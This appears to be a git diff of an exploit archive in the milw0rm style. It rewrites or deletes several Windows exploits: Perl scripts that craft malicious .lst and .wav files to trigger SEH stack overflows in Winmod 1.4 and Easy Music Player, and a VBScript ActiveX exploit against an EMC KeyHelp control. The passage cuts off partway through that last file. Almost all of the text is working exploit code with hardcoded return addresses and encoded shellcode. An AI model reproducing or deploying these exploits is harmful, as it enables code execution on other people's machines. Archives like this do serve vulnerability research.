+"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77". +"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a". +"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b". +"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57". +"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f". +"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73". +"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39". +"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45". +"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45". +"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41"; + +my $buf="\x41" x 500; +$buf = $buf."\x68\xD5\x85\x7C"; +$buf = $buf.("\x90" x 12); +$buf = $buf.$shellcode; +$buf = $buf."\x2E".("\x41"x9); + +open(FILE,'>cwh_xpl.lst') or die ("[+] Error: cannot open destination file\n"); +print FILE $buf; +close (FILE); + +print "[+] Create exploit file successful\n"; +print "[+] File's name is cwh_xpl.lst\n"; + +##################################################################### +#Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK +#Special Thx : asylu3, str0ke, citec.us, milw0rm.com +##################################################################### + +# milw0rm.com [2009-07-23] diff --git a/platforms/windows/local/9299.pl b/platforms/windows/local/9299.pl index e60083a52..6b16d75a8 100755 --- a/platforms/windows/local/9299.pl +++ b/platforms/windows/local/9299.pl @@ -1,53 +1,53 @@ -# -# Winmod 1.4 (.lst) Local Stack Overflow Exploit (RET overwrite+SEH) -# http://www.software112.com/products/winmod+download.html -# -# Exploit for Windows XP SP3 (en) -# -# by corelan - c0d3r -# Greetings to Saumil and SK -# - -my $sploitfile = "c:\\program files\\winmod\\xpl_sp3.lst"; - -my $buf="\x41" x 500; -$buf=$buf.pack('V',0x76B2D577); -$buf=$buf."\x41" x (2880-500); -my $nseh = "\xEB\x06\x90\x90"; -my $seh=pack('V',0x7C972ECD); -my $nop = "\x90" x 20; -## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com -my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". -"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41". -"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41". -"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59". -"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c". -"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45". -"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66". -"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f". -"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59". -"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a". -"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44". -"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77". -"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a". -"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b". -"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57". -"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f". -"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73". -"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39". -"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45". -"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45". -"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41"; - -$buf = $buf.$nseh.$seh.$nop.$shellcode; - -print "[+] Writing exploit file \n"; -open(FILE,'>$sploitfile'); -print FILE $buf; -close (FILE); -print "[+] Exploit file written : $sploitfile\n"; - - -print "[+] File's name is xpl_sp3.lst\n"; - -# milw0rm.com [2009-07-28] +# +# Winmod 1.4 (.lst) Local Stack Overflow Exploit (RET overwrite+SEH) +# http://www.software112.com/products/winmod+download.html +# +# Exploit for Windows XP SP3 (en) +# +# by corelan - c0d3r +# Greetings to Saumil and SK +# + +my $sploitfile = "c:\\program files\\winmod\\xpl_sp3.lst"; + +my $buf="\x41" x 500; +$buf=$buf.pack('V',0x76B2D577); +$buf=$buf."\x41" x (2880-500); +my $nseh = "\xEB\x06\x90\x90"; +my $seh=pack('V',0x7C972ECD); +my $nop = "\x90" x 20; +## win32_exec - EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com +my $shellcode="\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49". +"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41". +"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41". +"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59". +"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c". +"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45". +"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66". +"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f". +"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59". +"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a". +"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44". +"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77". +"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a". +"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b". +"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57". +"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f". +"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73". +"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39". +"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45". +"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45". +"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41"; + +$buf = $buf.$nseh.$seh.$nop.$shellcode; + +print "[+] Writing exploit file \n"; +open(FILE,'>$sploitfile'); +print FILE $buf; +close (FILE); +print "[+] Exploit file written : $sploitfile\n"; + + +print "[+] File's name is xpl_sp3.lst\n"; + +# milw0rm.com [2009-07-28] diff --git a/platforms/windows/local/9412.pl b/platforms/windows/local/9412.pl index fd0fa07a1..7d59779c2 100755 --- a/platforms/windows/local/9412.pl +++ b/platforms/windows/local/9412.pl @@ -1,39 +1,39 @@ -#!/usr/bin/perl -# by ahwak2000 -# email: 0.w[at]w.cn -# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH) -# http://www.otbcode.com/downloads/easymusicsetup.exe -################################################################### -my $shellcode= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". -"\x4e\x56\x43\x46\x42\x30\x5a"; -################################################################### -my $overflow="\x41" x 4128; -my $jmp="\x6F\xBA\x2D\x15";# Universal -my $nop="\x90" x 20; -################################################################### -open(myfile,'>> ahwak2000.wav'); -print myfile $overflow.$jmp.$nop.$shellcode; -################################################################### - -# milw0rm.com [2009-08-11] +#!/usr/bin/perl +# by ahwak2000 +# email: 0.w[at]w.cn +# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH) +# http://www.otbcode.com/downloads/easymusicsetup.exe +################################################################### +my $shellcode= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +################################################################### +my $overflow="\x41" x 4128; +my $jmp="\x6F\xBA\x2D\x15";# Universal +my $nop="\x90" x 20; +################################################################### +open(myfile,'>> ahwak2000.wav'); +print myfile $overflow.$jmp.$nop.$shellcode; +################################################################### + +# milw0rm.com [2009-08-11] diff --git a/platforms/windows/local/9418.pl b/platforms/windows/local/9418.pl index 2372b521a..4f039837f 100755 --- a/platforms/windows/local/9418.pl +++ b/platforms/windows/local/9418.pl @@ -1,39 +1,39 @@ -#!/usr/bin/perl -# by ThE g0bL!N -#Big thnx: His0k4 -#easy Music Player 1.0.0.2(wav) local Buffer Overflow Exploit (SEH) -################################################################## -my $bof="\x41" x 4132; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\xB8\x15\xC6\x72"; -my $nop="\x90" x 20; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". -"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> dz.wav'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-08-11] +#!/usr/bin/perl +# by ThE g0bL!N +#Big thnx: His0k4 +#easy Music Player 1.0.0.2(wav) local Buffer Overflow Exploit (SEH) +################################################################## +my $bof="\x41" x 4132; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\xB8\x15\xC6\x72"; +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> dz.wav'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-08-11] diff --git a/platforms/windows/local/9420.pl b/platforms/windows/local/9420.pl index 868a2e971..fb514732b 100755 --- a/platforms/windows/local/9420.pl +++ b/platforms/windows/local/9420.pl @@ -1,41 +1,41 @@ -#!/usr/bin/perl -# by hack4love -# hack4love@hotmail.com -# first http://www.milw0rm.com/exploits/9412 -# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH) -# http://www.otbcode.com/downloads/easymusicsetup.exe -############################################################################ -my $bof="\x41" x 4132; -my $nsh="\xEB\x06\x90\x90"; -my $seh="\x27\x4a\x01\x10";##lame_enc.dll## unvi -my $nop="\x90" x 20; -my $sec= -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". -"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". -"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". -"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". -"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". -"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". -"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". -"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". -"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". -"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". -"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". -"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". -"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". -"\x4e\x56\x43\x46\x42\x30\x5a"; -print $bof.$nsh.$seh.$nop.$sec; -################################################################### -open(myfile,'>> HACK4LOVE.wav'); -print myfile $bof.$nsh.$seh.$nop.$sec; -################################################################### - -# milw0rm.com [2009-08-12] +#!/usr/bin/perl +# by hack4love +# hack4love@hotmail.com +# first http://www.milw0rm.com/exploits/9412 +# Easy Music Player 1.0.0.2 (wav) Universal Local Buffer Exploit (SEH) +# http://www.otbcode.com/downloads/easymusicsetup.exe +############################################################################ +my $bof="\x41" x 4132; +my $nsh="\xEB\x06\x90\x90"; +my $seh="\x27\x4a\x01\x10";##lame_enc.dll## unvi +my $nop="\x90" x 20; +my $sec= +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34". +"\x42\x50\x42\x50\x42\x30\x4b\x38\x45\x34\x4e\x43\x4b\x48\x4e\x47". +"\x45\x30\x4a\x47\x41\x50\x4f\x4e\x4b\x48\x4f\x44\x4a\x41\x4b\x48". +"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x58\x46\x43\x4b\x38". +"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x48\x42\x4c". +"\x46\x37\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x55\x46\x32\x46\x30\x45\x47\x45\x4e\x4b\x48". +"\x4f\x35\x46\x32\x41\x30\x4b\x4e\x48\x56\x4b\x58\x4e\x30\x4b\x44". +"\x4b\x58\x4f\x55\x4e\x31\x41\x50\x4b\x4e\x4b\x58\x4e\x51\x4b\x48". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x33". +"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x48\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x48\x42\x54\x4e\x30\x4b\x58\x42\x57\x4e\x51\x4d\x4a". +"\x4b\x38\x4a\x36\x4a\x50\x4b\x4e\x49\x30\x4b\x48\x42\x48\x42\x4b". +"\x42\x50\x42\x50\x42\x50\x4b\x48\x4a\x56\x4e\x33\x4f\x35\x41\x53". +"\x48\x4f\x42\x56\x48\x45\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x57". +"\x42\x35\x4a\x46\x42\x4f\x4c\x58\x46\x50\x4f\x55\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x38\x50\x50\x47\x35\x4f\x4f\x47\x4e\x43\x36\x41\x56". +"\x4e\x56\x43\x46\x42\x30\x5a"; +print $bof.$nsh.$seh.$nop.$sec; +################################################################### +open(myfile,'>> HACK4LOVE.wav'); +print myfile $bof.$nsh.$seh.$nop.$sec; +################################################################### + +# milw0rm.com [2009-08-12] diff --git a/platforms/windows/remote/10008.txt b/platforms/windows/remote/10008.txt deleted file mode 100755 index 8daa7ebe0..000000000 --- a/platforms/windows/remote/10008.txt +++ /dev/null @@ -1,60 +0,0 @@ -<!-- -EMC multiple products KeyWorks KeyHelp Module (keyhelp.ocx 1.2.312) remote -buffer overflow exploit -(ie8 xp sp3) -by Nine:Situations:Group::pyrokinesis -site: http://retrogod.altervista.org/ - -tested products: -EMC Captiva QuickScan Pro 4.6 sp1 -EMC Documentum ApllicationXtender Desktop 5.4 -and possibly other products carrying quickscan - - -CLSID: {B7ECFD41-BE62-11D2-B9A8-00104B138C8C} -Progid: KeyHelp.KeyCtrl.1 -Binary Path: C:\WINDOWS\system32\KeyHelp.ocx -KillBitted: False -Implements IObjectSafety: True -Safe For Initialization (IObjectSafety): True -Safe For Scripting (IObjectSafety): True - -JumpMaddedID() and JumpURL() methods suffer of the same stack based buffer overflow -eip is overwritten after 537 bytes through the second argument, you can touch SEH even ---> -<html> -<object classid='clsid:B7ECFD41-BE62-11D2-B9A8-00104B138C8C' id='KEYHELPLib' /> -</object> -<script language='vbscript'> -//executing calc -scode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _ - unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _ - unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _ - unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _ - unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4a%4e%46%54") & _ - unescape("%42%30%42%50%42%50%4b%58%45%54%4e%53%4b%58%4e%37") & _ - unescape("%45%50%4a%47%41%30%4f%4e%4b%38%4f%44%4a%51%4b%48") & _ - unescape("%4f%55%42%42%41%30%4b%4e%49%44%4b%48%46%43%4b%38") & _ - unescape("%41%30%50%4e%41%53%42%4c%49%49%4e%4a%46%58%42%4c") & _ - unescape("%46%57%47%50%41%4c%4c%4c%4d%50%41%30%44%4c%4b%4e") & _ - unescape("%46%4f%4b%53%46%35%46%32%46%30%45%37%45%4e%4b%48") & _ - unescape("%4f%35%46%32%41%50%4b%4e%48%56%4b%38%4e%50%4b%54") & _ - unescape("%4b%48%4f%55%4e%31%41%30%4b%4e%4b%38%4e%41%4b%38") & _ - unescape("%41%30%4b%4e%49%58%4e%35%46%42%46%50%43%4c%41%43") & _ - unescape("%42%4c%46%36%4b%48%42%34%42%33%45%38%42%4c%4a%37") & _ - unescape("%4e%30%4b%48%42%34%4e%50%4b%48%42%57%4e%31%4d%4a") & _ - unescape("%4b%38%4a%46%4a%50%4b%4e%49%50%4b%48%42%38%42%4b") & _ - unescape("%42%30%42%50%42%30%4b%48%4a%36%4e%53%4f%35%41%33") & _ - unescape("%48%4f%42%46%48%35%49%58%4a%4f%43%48%42%4c%4b%57") & _ - unescape("%42%55%4a%46%42%4f%4c%48%46%50%4f%35%4a%46%4a%49") & _ - unescape("%50%4f%4c%38%50%30%47%55%4f%4f%47%4e%43%56%41%36") & _ - 